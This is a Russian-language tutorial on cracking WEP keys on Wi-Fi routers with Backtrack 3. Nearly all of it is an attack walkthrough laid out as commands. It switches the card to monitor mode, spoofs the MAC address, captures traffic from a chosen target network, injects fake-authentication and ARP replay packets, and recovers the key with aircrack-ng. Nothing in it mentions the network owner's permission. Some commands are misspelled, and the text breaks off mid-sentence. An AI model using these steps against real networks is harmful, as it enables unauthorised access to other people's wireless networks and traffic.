В данной статье будет объяснено каким образом можно взломать 64bit и 128bit WEP шифрование на различных WIFI роутерах используя Backtrack, live-дистрибутив Linux. Я выполнял описанные действия на ноутбуках IBM Thinkpad x60, Acer 5672 и  WIFI чипсет в этих машинах работал отлично.

Требования:

* Backtrack 3 на CD или USB
* Компьютер с поддерживаемой беспроводной картой 802.11
* Wireless Access point или WIFI роутер, использующий WEP шифрование

Подготавливаем WIFI карту

Для начала мы должны перевести карту в режим "Monitor Mode". Если вы используете чипчет IntelR PRO/Wireless 3945ABG выполните следующую команду:

modprobe -r iwl3945 modprobe ipwraw

Далее мы должны остановить нашу WIFI карту:

iwconfig

Посмотрим под каким именем виден ваш беспроводной интерфейс, далее остановим его командой:

airmon-ng stop [device]

Затем:

ifconfig down [interface]

Изменяем MAC адрес устройства:

macchanger --mac 00:11:22:33:44:66 [device]

Запускаем карту:

airmon-ng start [device]

Начинаем атаку

Теперь пришло время найти подходящую сеть для атаки. Запускаем команду:

airodump-ng [device]

Здесь мы видим доступные сети, в частности MAC адрес (BSSID), канал (CH) и имя (ESSID). Теперь начнем собирать данные с WIFI роутера для атаки:

airodump-ng -c [channel] -w [network.out] -bssid [bssid] [device]

Команда выше поместит полученные данные в файл network.out. Этот файл потребуется нам позднее когда мы будем готовы взламывать WEP ключ.

Откройте другое окно шелла и оставьте предыдущую команду выполняться. Теперь же мы сгенерируем несколько поддельных пакетов к роутеру для ускорения сбора данных. Используйте следующую команду:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

Если команда выше прошла успешно, мы будем генерировать большое количество пакетов на взламываемую сеть. Введите:
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

Это заставит точку доступа послать большое количество пакетов, которые мы сможем использовать для взлома WEP ключа. Проверьте ваш оставленный в первом окне шелла aerodump-ng. Вы должны увидеть там поле "data", в котором уже довольно много пакетов.

Когда значение этого поля достигает 10,000-20,000 вы можете начинать взлом ключа. Если нет других доступных сетей, можно попробовать команду:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

Когда мы наберем достаточно пакетов, начинаем взлом:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

Параметр "-n 128? указывает на 128-битный WEP ключ. Если взлом не получится, используйте  "-n 64?

Все, наш взлом завершился! Ключ найден и нам осталось только удалить из вывода символы :